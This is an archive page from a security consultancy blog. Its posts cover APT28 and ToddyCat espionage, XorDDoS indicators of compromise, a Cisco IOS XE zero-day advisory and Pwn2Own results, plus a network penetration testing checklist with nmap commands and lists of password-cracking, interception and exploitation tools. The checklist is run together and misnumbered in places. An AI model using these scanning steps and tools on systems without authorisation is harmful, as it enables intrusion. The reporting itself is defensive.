“Digital services operator Miranda-Media has been recording an unprecedented level of DDoS attacks from Ukrainian hacker groups since 9.05 am on October 27, 2023. As a result, there is a temporary unavailability of the services of Miranda-Media, Krymtelecom and MirTelecom.” reads the announcement.

“All technical and IT services of the company have been placed on high alert. All necessary measures are being taken to restore the network’s functionality. We will inform you further about the progress of the work.”

The Russian ISP managed to mitigate the attack by the end of Friday, it partially restored its services on Friday evening.

Telecommunication infrastructure and internet services are critical infrastructure and were targeted by both Russian and Ukrainian threat actors.

The Russia-linked APT group Sandworm (UAC-0165) has compromised eleven telecommunication service providers in Ukraine between May and September 2023, reported the Ukraine’s Computer Emergency Response Team (CERT-UA).

According to public sources, the threat actors targeted ICS of at least 11 Ukrainian telecommunications providers leading to the disruption of their services.

“According to public sources, for the period from 11.05.2023 to 27.09.2023, an organized group of criminals tracked by the identifier UAC-0165 interfered with the information and communication systems (ICS) of no less than 11 telecommunications providers of Ukraine, which, among other things, led to interruptions in the provision of services to consumers.” reads the advisory published by the CERT-UA.

Internet Provider Security A Complete Guide

InfoSec tools | InfoSec services | InfoSec books | Follow our blog | DISC llc is listed on The vCISO Directory

Tags: Internet Provider Security, INTERNET PROVIDERS

Oct 27 2023

HOW APT28 INFILTRATES NETWORKS IN FRENCH UNIVERSITIES & NUCLEAR PLANTS WITHOUT DETECTION

Category: APT,Information Securitydisc7 @ 1:19 pm
How APT28 Infiltrates Networks in French Universities & Nuclear Plants Without Detection

According to a recent study published by the leading cybersecurity agency in France, a hacking organisation affiliated with Russia’s military intelligence agency has been spying on French colleges, corporations, think tanks, and government institutions. The research was published by the agency.

Since the second half of 2021, the group of hackers known as Fancy Bear or APT28 has been operating covertly into French computer networks in an effort to acquire a variety of sensitive sorts of data. According to the findings of the investigation conducted by the National Cybersecurity Agency of France, also known as ANSSI, the perpetrators of the attacks hacked systems that were not being actively watched, such as routers, and abstained from employing backdoors in order to avoid being discovered. These cyber attackers infiltrate peripheral devices on crucially important French organisational networks, according to a recent study published by France’s National Agency for the Security of Information Systems (ANSSI), and they do so without making use of backdoors in order to avoid detection. After conducting an analysis of the group’s Techniques, Tactics, and Procedures (TTPs), ANSSI came to the conclusion that APT28 infiltrates target networks via brute force and credential leaks in order to get access to accounts and Ubiquiti routers. In April of 2023, a phishing expedition was begun with the purpose of obtaining system settings, insights into operational operations, and other relevant data. Using the flaw identified as CVE-2023-23397, APT28 sent emails to Outlook users during the months of March 2022 and June 2023. In order to carry out reconnaissance and data collecting, the attackers made use of other vulnerabilities, such as CVE-2022-30190 (Follina) in Microsoft Windows Support Diagnostic Tool (MSDT) and CVE-2020-12641 in Roundcube webmail. Both of these vulnerabilities were exploited by the attackers.

In order to carry out their intrusions, the gang made use of applications such as the password harvester Mimikatz and the traffic relay tool reGeorg. Additionally, they made use of open-source services such as Mockbin and Mocky. It is important to understand that APT28 use a wide variety of different VPN clients.

As a cyber-espionage group, APT28’s primary mission is to gain unauthorised access and steal information from its targets. The hackers stole sensitive information from email accounts and stole authentication details by using common tools. The hackers also stole emails that were full of personal information. The Command and Control (C2) architecture is rooted on cloud services such as Google Drive and Microsoft OneDrive, which makes it more difficult to identify them.

ANSSI has mapped the TTPs (techniques, tactics, and procedures) of APT28 and found that the threat organisation breaches accounts and Ubiquiti routers on targeted networks by using brute-force attacks and leaked databases holding passwords.

Personal data of people who applied for France Visa gets leaked. French government confirms the incident

In one incident that occurred in April 2023, the adversaries carried out a phishing effort that duped the receivers into executing PowerShell, which revealed their system settings, running processes, and other OS-related information.

APT28 is responsible for sending emails to Outlook users that attacked a zero-day vulnerability that is now known as CVE-2023-23397. These emails were sent between March 2022 and June 2023, which places the first exploitation a month earlier than what was previously revealed.

The ANSSI emphasises taking a comprehensive approach to security, which includes conducting risk assessments. In light of the dangers posed by APT28, there should be a special focus on ensuring the safety of email communications. The following is a list of the most important suggestions that the organisation has about the safety of email:

Protecting the privacy of email communications and preventing their disclosure via 
adopting secure exchange systems as a means of preventing the diversion or acquisition of email traffic. Reducing the potential points of attack on email online interfaces and managing the dangers posed by servers such as Microsoft Exchange and putting in place mechanisms that can identify malicious emails.

Attribution of Advanced Persistent Threats: How to Identify the Actors Behind Cyber-Espionage

InfoSec tools | InfoSec services | InfoSec books | Follow our blog | DISC llc is listed on The vCISO Directory

Oct 26 2023

Most Important Network Penetration Testing Checklist

Category: Cheat Sheet,Information Security,Pen Testdisc7 @ 9:25 am
Most Important Network Penetration Testing Checklist

Network Penetration Testing checklist determines vulnerabilities in the network posture by discovering Open ports, troubleshooting live systems, and services, and grabbing system banners.

The pen-testing helps the administrator to close unused ports, additional services, Hide or customize banners, troubleshoot services, and to calibrate firewall rules.

You should test in all ways to guarantee there is no security loophole.

Network penetration testing, also known as ethical hacking or white-hat hacking, is a systematic process of evaluating the security of a computer network infrastructure.

The goal of a network penetration test is to identify vulnerabilities and weaknesses in the network’s defenses that malicious actors could potentially exploit.

Let’s see how we conduct step-by-step Network penetration testing by using some famous network scanners.

1. Host Discovery

Footprinting is the first and most important phase where one gathers information about their target system.

DNS footprinting helps to enumerate DNS records like (A, MX, NS, SRV, PTR, SOA, and CNAME) resolving to the target domain.

  • A – A record is used to point the domain name such as gbhackers.com to the IP address of its hosting server.
  •  MX – Records responsible for Email exchange.
  • NS – NS records are to identify DNS servers responsible for the domain.
  • SRV – Records to distinguish the service hosted on specific servers.
  • PTR – Reverse DNS lookup, with the help of IP you can get domains associated with it.
  • SOA – Start of record, it is nothing but the information in the DNS system about DNS Zone and other DNS records.
  • CNAME – Cname record maps a domain name to another domain name.

We can detect live hosts, and accessible hosts in the target network by using network scanning tools such as Advanced IP scanner, NMAP, HPING3, and NESSUS.

Ping&Ping Sweep:

root@kali:~# nmap -sn 192.168.169.128root@kali:~# nmap -sn 192.168.169.128-20 To ScanRange of IProot@kali:~# nmap -sn 192.168.169.* Wildcardroot@kali:~# nmap -sn 192.168.169.128/24 Entire Subnet

Whois Information 

To obtain Whois information and the name server of a websiteroot@kali:~# whois testdomain.com

  1. http://whois.domaintools.com/
  2. https://whois.icann.org/en

Traceroute

Network Diagonastic tool that displays route path and transit delay in packetsroot@kali:~# traceroute google.com

Online Tools

  1. http://www.monitis.com/traceroute/
  2. http://ping.eu/traceroute/

2. Port Scanning

Perform port scanning using tools such as Nmap, Hping3, Netscan tools, and Network monitor. These tools help us to probe a server or host on the target network for open ports.

root@kali:~# nmap –open gbhackers.com             To find all open ports

root@kali:~# nmap -p 80 192.168.169.128           Specific Port

root@kali:~# nmap -p 80-200 192.168.169.128   Range of ports

root@kali:~# nmap -p “*” 192.168.169.128          To scan all ports

Online Tools

  1. http://www.yougetsignal.com/
  2. https://pentest-tools.com/information-gathering/find-subdomains-of-domain

3. Banner Grabbing/OS Fingerprinting

Perform banner Grabbing/OS fingerprinting such as Telnet, IDServe, and NMAP determines the operating system of the target host and the operating system.

Once you know the version and operating system of the target, you need to find the vulnerabilities and exploit them. Try to gain control over the system.

root@kali:~# nmap -A 192.168.169.128root@kali:~# nmap -v -A 192.168.169.128 with high verbosity level

IDserve is another good tool for Banner Grabbing.

Networkpentesting Flowchart

Online Tools

  1. https://www.netcraft.com/
  2. https://w3dt.net/tools/httprecon
  3. https://www.shodan.io/

4. Scan For Vulnerabilities

Scan the network using Vulnerabilities using GIFLanguard, Nessus, Ratina CS, SAINT.

These tools help us find vulnerabilities in the target and operating systems. With these steps, you can find loopholes in the target network system.

GFILanguard

It acts as a security consultant and offers patch management vulnerability assessment, and network auditing services.

Nessus

Nessus is a vulnerability scanner tool that searches for bugs in software and finds a specific way to violate the security of a software product.

  • Data gathering.
  • Host identification.
  • Port scan.
  • Plug-in selection.
  • Reporting of data.

5. Draw Network Diagrams

Draw a network diagram about the organization that helps you understand the logical connection path to the target host in the network.

The network diagram can be drawn by LANmanager, LANstate, Friendly pinger, and Network View.

6. Prepare Proxies

Proxies act as an intermediary between two networking devices. A proxy can protect the local network from outside access.

With proxy servers, we can anonymize web browsing and filter unwanted content, such as ads and many others.

Proxies such as Proxifier, SSL Proxy, Proxy Finder..etc, to hide from being caught.

6. Document All Findings

The last and very important step is to document all the findings from penetration testing.

This document will help you find potential vulnerabilities in your network. Once you determine the Vulnerabilities, you can plan counteractions accordingly.

You can download the rules and scope Worksheet here: Rules and Scope sheet 

Thus, penetration testing helps assess your network before it gets into real trouble that may cause severe loss in terms of value and finance.

important tools

Important Tools Used For Network Pentesting

Frameworks

Kali Linux, Backtrack5 R3, Security Onion

Reconnaisance

Smartwhois, MxToolbox, CentralOps, dnsstuff, nslookup, DIG, netcraft

Discovery

Angry IP scanner, Colasoft ping tool, nmap, Maltego, NetResident,LanSurveyor, OpManager

Port Scanning

Nmap, Megaping, Hping3, Netscan tools pro, Advanced port scannerService Fingerprinting Xprobe, nmap, zenmap

Enumeration

Superscan, Netbios enumerator, Snmpcheck, onesixtyone, Jxplorer, Hyena,DumpSec, WinFingerprint, Ps Tools, NsAuditor, Enum4Linux, nslookup, Netscan

Scanning

Nessus, GFI Languard, Retina,SAINT, Nexpose

Password Cracking

Ncrack, Cain & Abel, LC5, Ophcrack, pwdump7, fgdump, John The Ripper,Rainbow Crack

Sniffing

Wireshark, Ettercap, Capsa Network Analyzer

MiTM Attacks

Cain & Abel, Ettercap

Exploitation

 Metasploit, Core Impact

These are the Most important checklist you should concentrate with Network penetration Testing .

Also Read:

Penetration Testing – Protecting Networks and Systems

InfoSec tools | InfoSec services | InfoSec books | Follow our blog | DISC llc is listed on The vCISO Directory

Tags: Network Penetration Testing Checklist

Oct 26 2023

PWN2OWN TORONTO 2023 DAY 1 – ORGANIZERS AWARDED $438,750 IN PRIZES

Category: HackingDISC @ 7:13 am
Pwn2Own Toronto 2023 Day 1 – organizers awarded $438,750 in prizes

During the Day 1 of the Pwn2Own Toronto 2023 hacking contest, the organization has awarded a total of $438,750 in prizes!

Team Orca of Sea Security received the greatest rewards of the day, the researchers chained two issues using an OOB Read and UAF against the Sonos Era 100. They earned $60,000 and 6 Master of Pwn points.

Researchers from Pentest Limited demonstrated an Improper Input Validation against the Samsung Galaxy S23. They earned $50,000 and 5 Master of Pwn points.

The team STAR Labs SG exploited a permissive list of allowed inputs against the Samsung Galaxy S23 and earned $25,000 and 5 Master of Pwn points.

Pentest Limited also earned $40,000 and 4 Master of Pwn points by executing a 2-bug chain against the My Cloud Pro Series PR4100 using a DoS and server-side request forgery (SSRF).

Team Viettel demonstrated a single-bug attack against the Xiaomi 13 Pro and earned $40,000 and 4 Master of Pwn points.

Team ECQ also earned $40,000 and 4 Master of Pwn points by executing a 3-bug chain using an SSRF and two injection vulnerabilities against the QNAP TS-464.

Binary Factory and Synacktiv demonstrated working attacks against the Synology BC500 and earned $30,000 and 3 Master of Pwn points and $15,000 and 3 Master of Pwn points respectively.

Compass Security also executed a stack overflow attack against the Synology BC500, but the exploit they used was previously known. They still earn $3,750 and 0.75 Master of Pwn points.

Other successful attacks were demonstrated against Canon imageCLASS MF753Cdw and Lexmark CX331adwe.

Below is the leaderboard after Pwn2Own Toronto 2023 Day 1.

https://x.com/thezdi/status/1717319411688747052?s=20

Tags: pwn2own

Oct 23 2023

10 Best Hacker-Friendly Search Engines Of 2023

Category: Hacking,Information Security,Web Search Enginedisc7 @ 8:33 am

The search engines allow users to find any content via the world wide web.

It helps to find any information easily and is a web-based tool that allows someone to discover or detect any data.

Here are the best Hackers’ Search Engines.

There are various search engines that are available online, hackers use. So we are describing here in this article the top search engines for hackers.

10 Best Hackers Search Engines

The search engines allow users to find any content via the world wide web.

It helps to find any information easily and is a web-based tool that allows someone to discover or detect any data.

Here are the best Hackers’ Search Engines.

There are various search engines that are available online, hackers use. So we are describing here in this article the top search engines for hackers.

10 Best Hackers Search Engines

Best Hackers Search EnginesKey Features
ShodanIt is very useful and easy to use
Freely available
GreyNoise VisualizerTargeted scan and attack traffic.
WiGLEWireless network mapping
It has web applications
CensysEnhance general security
It helps to find open ports
HunterThis is the most dynamic
It is also accessible along with their API
PiplThis is the world’s largest people search engine.
PublicWWWIt has API  also for developers for integration
Shows millions of results for any search request
Zoom EyeIt is very useful for investigators
It is used in cyberspace as wayfinding
HIBPIt is one of the most powerful tools
OSINT FrameworkOpen Source Intelligence framework
Easy to use

10 Best Hacker-Friendly Search Engines of 2023

InfoSec tools | InfoSec services | InfoSec books | Follow our blog | DISC llc is listed on The vCISO Directory

Tags: Hacker-Friendly Search Engines

Oct 20 2023

Hackers Using Secure USB Drives To Attack Government Entities

Category: Cyber Attack,Hacking,Information Securitydisc7 @ 9:36 am

An ongoing attack on government agencies in the APAC region has been claimed to have compromised a secure USB device with hardware encryption.

The nation’s government agencies utilize these safe USB devices to transfer and save data between computer systems.

The attacks had a very small number of victims and were highly targeted. The attacks are believed to have been conducted by a highly experienced and resourceful threat actor interested in conducting espionage operations in secure and private government networks.

Cyber Espionage Via Secure USBs

According to the Kaspersky APT trends report for Q3 2023, this long-running campaign comprises several malicious modules that may execute commands, gather data from infected workstations, and transfer it to further machines using the same or different secure USB drives. 

On the infected computers, the attacks can also carry out additional harmful files.

The attack uses sophisticated tools and methods, such as virtualization-based software obfuscation for malware components, self-replication through connected secure USB drives to spread to other air-gapped systems, and code injection into a legitimate access management program on the USB drive that serves as a loader for the malware on a new machine.

BlindEagle, a financially motivated threat group, has targeted both people and governmental organizations in South America. Although espionage is the threat actor’s main objective, it has demonstrated interest in obtaining financial data.

BlindEagle is characterized by its capacity to cycle through different open-source remote access Trojans (RATs), including AsyncRAT, Lime-RAT, and BitRAT, and utilize them as the ultimate payload to accomplish its goals.

The gang sends spear-phishing emails with Microsoft Office documents attached to its victims. This starts a multi-level infection strategy that results in installing a new Trojan that is primarily made to steal data from the victim’s computer and take over by executing arbitrary commands.

APT campaigns are still widely spread geographically. Attackers have targeted Europe, South America, the Middle East, and other regions of Asia this quarter.

Government, military, defense, gaming, software, entertainment, utilities, banking, and manufacturing are just a few of the industries being attacked.

Cyber espionage continues to be a top priority of APT campaigns, and geopolitics continues to be a major factor in APT development.

“It is therefore very important to build a deep understanding of the TTPs of this threat actor and to watch out for future attacks,” reads the report.

https://gbhackers.com/hackers-using-secure-usb-attack-government-entities/

Kingston Ironkey Locker+ 50 16GB Encrypted USB Flash Drive | USB 3.2 Gen 1 | XTS-AES Protection | Multi-Password Security Options | Automatic Cloud Backup

InfoSec tools | InfoSec services | InfoSec books | Follow our blog | DISC llc is listed on The vCISO Directory

Tags: encrypted usb drive, USB Drives To Attack

Oct 18 2023

XorDDoS Infects Linux Devices And Uses Them To Carry Out DDoS Attacks

Category: DDoS,Information Securitydisc7 @ 9:00 am

A new campaign has been discovered that uses XorDDoS Trojan, which affects Linux systems and devices, turning them into zombies that can be controlled by threat actors remotely.

Moreover, these compromised systems can later be used for DDoS(Distributed Denial-of-Service) attacks.

Comparing this current campaign with the campaign conducted in 2022, there was only one change found, which was the configuration of the C2 hosts.

However, the attacking domains were still unchanged. The threat actors seem to have migrated their offensive infrastructure to hosts running on legitimate public hosting services.

Additionally, with respect to the 2022 campaign, many security vendors have already classified the C2 domains as malicious and barred them but still the current active malware traffic is being directed to new IPs.

As part of the initial access vector, the threat actors scanned for hosts with HTTP service, vulnerable to directory traversal attacks that can enable access to arbitrary files on the server.

Threat actors specifically targeted the /etc/passwd file to read passwords. However, since the file has only encrypted passwords, they were forced to gain initial access through SSH brute-force attacks. Once they gained access, they downloaded malware from remote servers and owned the system.

XorDDoS Infects Linux Devices

XorDDoS Trojan uses an XOR encryption key (BB2FA36AAA9541F0) to encrypt all the execution-related data which are then decrypted using a decryption function. Once the malware is activated on the victim machine, it retrieves essential information such as /var/run/gcc.pid, the OS version, malware version, memory status, and CPU information.

The malware also used the decrypt_remotestr() function to decrypt the C2 domains embedded inside the executable. The C2 endpoints are,

  • ppp.gggatat456[.]com:53
  • ppp.xxxatat456[.]com:53
  • p5.dddgata789[.]com:53
  • P5.lpjulidny7[.]com:53
C2 decryption function
C2 decryption function (Source: Palo Alto Unit42)

Persistence

As a means of persistence, the malware creates scheduled autorun tasks, which will run every three minutes, along with an autorun service configured during startup.

Detection evasion is achieved by turning its process into a background service that can disguise itself as a legitimate process.

C2 Network Infrastructure

A list of C2 domains that were registered and used by the threat actors is as follows:

C2 DomainsName ServerC2 SubdomainsIP AddressesAutonomous System
xxxatat456[.]comname-services[.]comaaa.xxxatat456[.]comb12.xxxatat456[.]comppp.xxxatat456[.]comwww.ppp.xxxatat456[.]comwww.xxxatat456[.]com142.0.138[.]41142.0.138[.]42142.0.138[.]43142.0.138[.]44142.4.106[.]73142.4.106[.]75192.74.236[.]33192.74.236[.]34192.74.236[.]3554600
gggatat456[.]comname-services[.]comaaa.gggatat456[.]comppp.gggatat456[.]comwww1.gggatat456[.]comwww.ppp.gggatat456[.]com142.0.138[.]41142.0.138[.]42142.0.138[.]43142.4.106[.]73142.4.106[.]74142.4.106[.]75142.4.106[.]76192.74.236[.]33192.74.236[.]34192.74.236[.]35192.74.236[.]3654600
lpjulidny7[.]comdomaincontrol[.]comp0.lpjulidny7[.]comp2.lpjulidny7[.]comp3.lpjulidny7[.]comp4.lpjulidny7[.]comp5.lpjulidny7[.]com34.98.99[.]30396982
dddgata789[.]comdomaincontrol[.]comddd.dddgata789[.]comp5.dddgata789[.]comN/AN/A

Source: Palo Alto Unit42

Complete Network Infrastructure
Complete Network Infrastructure (Source: Palo Alto Unit42)

Furthermore, a comprehensive report about this new campaign and the trojan has been published by Unit42 of Palo Alto, which provides detailed information about the campaign, code analysis, obfuscation techniques, and other information.

Indicators Of Compromises (IOCs)

XorDDoS Binaries

  • b8c4d68755d09e9ad47e0fa14737b3d2d5ad1246de5ef1b3c794b1339d8fe9f8
  • 265a38c6dee58f912ff82a4e7ce3a32b2a3216bffd8c971a7414432c5f66ef11
  • 1e823ae1e8d2689f1090b09dc15dc1953fa0d3f703aec682214750b9ef8795f1
  • 989a371948b2c50b1d45dac9b3375cbbf832623b30e41d2e04d13d2bcf76e56b
  • 20f202d4a42096588c6a498ddb1e92f5b7531cb108fca45498ac7cd9d46b6448
  • 9c5fc75a453276dcd479601d13593420fc53c80ad6bd911aaeb57d8da693da43
  • ce0268e14b9095e186d5d4fe0b3d7ced0c1cc5bd9c4823b3dfa89853ba83c94f
  • aeb29dc28699b899a89c990eab32c7697679f764f9f33de7d2e2dc28ea8300f5
XorDDoS Infects Linux Devices and uses them to Carry out DDoS Attacks

Ethical Hacking Volume 10: DoS/DDoS Attacks: Protecting Network and Services

InfoSec tools | InfoSec services | InfoSec books | Follow our blog | DISC llc is listed on The vCISO Directory

Tags: DDoS attacks, XorDDoS

Oct 17 2023

CISCO’S TICKING TIME BOMB: CVE-2023-20198 WITH CVSS SCORE 10 HITS CISCO DEVICES

Category: Network securitydisc7 @ 9:10 am
Cisco’s Ticking Time Bomb: CVE-2023-20198 with CVSS Score 10 Hits Cisco Devices

Cisco IOS XE is a robust and flexible operating system, optimized for the evolving landscape of enterprise networking and technology. It enables model-driven programmability, application hosting, and automated configuration management, thus simplifying many day-to-day tasks. IOS XE is integral in providing consistency across Cisco’s array of switching, routing, and wireless network devices.

THE VULNERABILITY: CVE-2023-20198


A new, critical zero-day vulnerability has emerged, labeled as CVE-2023-20198. This vulnerability, with a maximum severity rating of CVSS 10, predominantly affects devices running the Cisco IOS XE software and is currently without a patch, leaving systems vulnerable to potential exploits. The flaw can be exploited by an unauthenticated attacker to create a user account with the highest privilege level, leading to unauthorized system access.

Two security flaws in the Cisco AnyConnect Secure Mobility Client. Patch immediately

Exploitation in the Wild
Attackers have already begun exploiting this vulnerability in the wild, utilizing it to deliver malicious implants. Organizations using the affected devices are advised to apply mitigation measures promptly to defend against these exploits.

Affected Devices and Systems
The vulnerability, CVE-2023-20198, affects all Cisco IOS XE devices that have the Web UI feature enabled, especially when exposed to the internet or untrusted networks. To ascertain if a system is vulnerable, administrators should:

  1. Utilize the command show running-config | include ip http server|secure|active to check for the presence of ip http server or ip http secure-server commands in the global configuration.
  2. Inspect the configuration for ip http active-session-modules none or ip http secure-active-session-modules none to determine if the vulnerability is exploitable over HTTP or HTTPS respectively.

Cisco’s Response
Cisco has acknowledged the vulnerability, confirming its presence in devices running the Cisco IOS XE software. The company provided steps to identify affected systems and noted the following Indicators of Compromise (IoCs):

  1. System logs containing messages indicating programmatic configuration by unfamiliar users, such as:
  • %SYS-5-CONFIG_P: Configured programmatically by process SEP_webui_wsma_http from console as user on line.
  • %SEC_LOGIN-5-WEBLOGIN_SUCCESS: Login Success [user: user] [Source: source_IP_address].
  1. System logs containing messages about unknown file installation actions, like:
  • %WEBUI-6-INSTALL_OPERATION_INFO: User: username, Install Operation: ADD filename.
  1. Presence of an implant, checked by issuing the following command from a workstation with access to the affected system:
  • curl -k -X POST "https://systemip/webui/logoutconfirm.html?logon_hash=1", if a hexadecimal string is returned, the implant is present.

Cisco, alongside other cybersecurity firms like Tenable, has provided plugins to identify affected systems. While awaiting a patch, these plugins and the aforementioned checks can assist in identifying and mitigating unauthorized access attempts.


CVE-2023-20198 poses a significant threat to cybersecurity due to its maximum severity rating and the absence of a patch. Organizations using affected Cisco IOS XE devices should remain vigilant and apply necessary mitigation measures to safeguard their systems from potential exploits.

Zero Trust Architecture (Networking Technology: Security)

InfoSec tools | InfoSec services | InfoSec books | Follow our blog | DISC llc is listed on The vCISO Directory

Tags: Cisco, CVE-2023-20198, Zero Trust Architecture

Oct 16 2023

GUARDIANS OF THE HACKERS GALAXY: UNLOCK THE TOOL OF TODDYCAT’S GROUP

Category: Cyber Espionage,Security Toolsdisc7 @ 9:36 am
Guardians of the Hackers Galaxy: Unlock the tool of ToddyCat’s Group

COMPREHENSIVE ANALYSIS: TODDYCAT’S ADVANCED TOOLSET AND STEALTHY CYBER ESPIONAGE TACTICS

ToddyCat, an Advanced Persistent Threat (APT) group, has garnered attention for its clandestine cyber-espionage operations, utilizing a sophisticated toolset designed for data theft and exfiltration. The group employs a myriad of techniques to move laterally within networks and conduct espionage operations with a high degree of secrecy and efficiency. This article, incorporating insights from the article and other sources, aims to provide a detailed overview of ToddyCat’s toolset and operational tactics.

STEALTH AND SOPHISTICATION: TODDYCAT’S MODUS OPERANDI

ToddyCat employs disposable malware, ensuring no clear code overlaps with known toolsets, thereby enhancing its ability to remain undetected. The malware is designed to steal and exfiltrate data, while the group employs various techniques to move laterally within networks and conduct espionage operations.

EXPLOITATION TECHNIQUES AND MALWARE UTILIZATION

  • Disposable Malware: Utilized to enhance stealth and evasion capabilities.
  • Data Exfiltration: Malware designed to access and extract sensitive information.
  • Lateral Movement: Techniques employed to expand reach and access within compromised environments.

TOOLSET SUMMARY

  1. Dropbox Exfiltrator: A tool designed to exfiltrate data, ensuring that stolen information can be securely and covertly transferred to the attackers.
  2. LoFiSe: A tool that may be utilized for lateral movement and further exploitation within compromised networks.
  3. Pcexter: A tool that may be used to send specific files or data to external servers, facilitating data exfiltration.
  4. Dropper: A tool that may be utilized to deploy additional payloads or malware within compromised environments.
RedEye: A great opensource cyber security Log Visualization tool for Red and Blue teams

DETAILED INSIGHTS INTO THE TOOLSET

1. LOADERS

  • Standard Loaders: ToddyCat utilizes 64-bit libraries, invoked by rundll32.exe or side-loaded with legitimate executable files, to load the Ninja Trojan during the infection phase. Three variants of these loaders have been observed, each differing in aspects like the library loaded by, where the malicious code resides, the loaded file, and the next stage.
  • Tailored Loader: A variant of the standard loader, this is customized for specific systems, employing a unique decryption scheme and storing encrypted files in a different location and filename (%CommonApplicationData%\Local\user.key).

2. NINJA TROJAN

The Ninja Trojan, a sophisticated malware written in C++, is a potent tool in ToddyCat’s arsenal. It provides functionalities like:

  • Managing running processes
  • File system management
  • Managing multiple reverse shell sessions
  • Injecting code into arbitrary processes
  • Loading additional modules during runtime
  • Proxy functionality to forward TCP packets between the C2 and a remote host

3. LOFISE

LoFiSe is a component designed to find and collect files of interest on targeted systems. It tracks changes in the file system, filtering files based on size, location, and extension, and collects suitable files for further action.

4. DROPBOX UPLOADER

This generic uploader, not exclusive to ToddyCat, is used to exfiltrate stolen documents to DropBox, accepting a DropBox user access token as an argument and uploading files with specific extensions.

5. PCEXTER

Pcexter is another uploader used to exfiltrate archive files to Microsoft OneDrive. It is distributed as a DLL file and executed using the DLL side-loading technique.

POTENTIAL IMPACT AND THREAT LANDSCAPE

The emergence of ToddyCat’s new toolset and its sophisticated TTPs presents a significant threat to organizations, with potential impacts including data breaches, unauthorized access to sensitive information, and network compromise.

MITIGATION AND DEFENSE STRATEGIES

  • Enhanced Monitoring: Implementing monitoring solutions to detect anomalous activities.
  • User Education: Ensuring users are educated about potential threats and cybersecurity best practices.
  • Regular Patching: Keeping all systems regularly patched and updated.
  • Threat Intelligence: Leveraging intelligence to stay abreast of the latest TTPs employed by threat actors.

ToddyCat’s advanced toolset and stealthy operations underscore the evolving and sophisticated nature of cyber threats. Organizations and cybersecurity practitioners must remain vigilant and adopt advanced cybersecurity practices to defend against the sophisticated tools and tactics employed by threat actors like ToddyCat.

Spy Secrets That Can Save Your Life: A Former CIA Officer Reveals Safety and Survival Techniques to Keep You and Your Family Protected

100 Deadly Skills: The SEAL Operative’s Guide to Eluding Pursuers, Evading Capture, and Surviving Any Dangerous Situation

InfoSec tools | InfoSec services | InfoSec books | Follow our blog | DISC llc is listed on The vCISO Directory

Tags: ToddyCat’s Group

« Previous PageNext Page »